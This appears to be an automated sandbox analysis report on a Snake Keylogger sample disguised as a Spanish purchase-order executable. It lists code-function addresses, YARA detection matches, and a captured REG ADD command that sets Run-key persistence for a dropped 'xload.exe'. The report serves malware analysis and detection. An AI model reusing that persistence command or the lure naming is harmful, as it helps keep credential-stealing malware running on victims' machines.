Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAE988	20_2_00CAE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CA69A0	20_2_00CA69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CACA08	20_2_00CACA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CACCD8	20_2_00CACCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CA9DE0	20_2_00CA9DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CA6FC8	20_2_00CA6FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CACFAB	20_2_00CACFAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAF961	20_2_00CAF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAE97B	20_2_00CAE97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621E6B0	20_2_0621E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06211E80	20_2_06211E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_062117A0	20_2_062117A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621FC68	20_2_0621FC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06219C70	20_2_06219C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06219548	20_2_06219548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06210B30	20_2_06210B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06215028	20_2_06215028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06212968	20_2_06212968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621DE00	20_2_0621DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06211E70	20_2_06211E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621E6AF	20_2_0621E6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621EF60	20_2_0621EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621EF51	20_2_0621EF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621178F	20_2_0621178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621CCA0	20_2_0621CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621D540	20_2_0621D540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621D550	20_2_0621D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621DDFF	20_2_0621DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621E24B	20_2_0621E24B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621E258	20_2_0621E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621EAF8	20_2_0621EAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06210B20	20_2_06210B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06219328	20_2_06219328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621EB08	20_2_0621EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06218BA0	20_2_06218BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621F3B8	20_2_0621F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06218B91	20_2_06218B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06219BFB	20_2_06219BFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621F803	20_2_0621F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621F810	20_2_0621F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06215018	20_2_06215018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621001F	20_2_0621001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06210040	20_2_06210040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621D0F8	20_2_0621D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621295B	20_2_0621295B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621D9A8	20_2_0621D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0621D999	20_2_0621D999
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_02708448	21_2_02708448
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_02708C38	21_2_02708C38
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0270CBD8	21_2_0270CBD8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_048E0448	21_2_048E0448
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0703B360	21_2_0703B360
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07033E00	21_2_07033E00
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07035568	21_2_07035568
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07036048	21_2_07036048
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07035870	21_2_07035870
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07039CF8	21_2_07039CF8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07034721	21_2_07034721
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07034730	21_2_07034730
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070303A0	21_2_070303A0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070303B0	21_2_070303B0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07038FC8	21_2_07038FC8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07030A0B	21_2_07030A0B
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07037E08	21_2_07037E08
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07030A18	21_2_07030A18
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070396F8	21_2_070396F8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0703151D	21_2_0703151D
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07035558	21_2_07035558
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07031560	21_2_07031560
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07034D89	21_2_07034D89
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07034D98	21_2_07034D98
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0703F5C8	21_2_0703F5C8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070305D8	21_2_070305D8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070305E8	21_2_070305E8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07033DF1	21_2_07033DF1
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07030006	21_2_07030006
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07036038	21_2_07036038
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07030040	21_2_07030040
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0703C048	21_2_0703C048
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07035860	21_2_07035860
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07030870	21_2_07030870
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07034091	21_2_07034091
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_070340A0	21_2_070340A0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704DB20	21_2_0704DB20
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704CA18	21_2_0704CA18
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704AE18	21_2_0704AE18
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704EA20	21_2_0704EA20
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704D150	21_2_0704D150
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704DB1B	21_2_0704DB1B
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704AE09	21_2_0704AE09
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07042E45	21_2_07042E45
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07042E78	21_2_07042E78
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07042E7A	21_2_07042E7A
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704D140	21_2_0704D140
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704BDD8	21_2_0704BDD8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704BDE8	21_2_0704BDE8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704C9FE	21_2_0704C9FE
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0704F8C8	21_2_0704F8C8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078845B8	21_2_078845B8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07880040	21_2_07880040
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0788F397	21_2_0788F397
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_0788F3A8	21_2_0788F3A8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078E41D8	21_2_078E41D8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078EFCA3	21_2_078EFCA3
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078EFAA0	21_2_078EFAA0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078EFCB0	21_2_078EFCB0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078E41BF	21_2_078E41BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0A088	22_2_00F0A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F069B0	22_2_00F069B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0C148	22_2_00F0C148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F07118	22_2_00F07118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0D278	22_2_00F0D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0CA08	22_2_00F0CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F05370	22_2_00F05370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0CCD8	22_2_00F0CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0C468	22_2_00F0C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0CFAA	22_2_00F0CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F0C738	22_2_00F0C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F029E0	22_2_00F029E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F03A99	22_2_00F03A99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 22_2_00F03E09	22_2_00F03E09

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: invalid certificate

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000000.1356893313.00000000003C4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetupSfx.exe4 vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1532073538.000000000084D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1541699498.0000000004DD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Binary or memory string: OriginalFilenameSetupSfx.exe4 vs CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"

Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
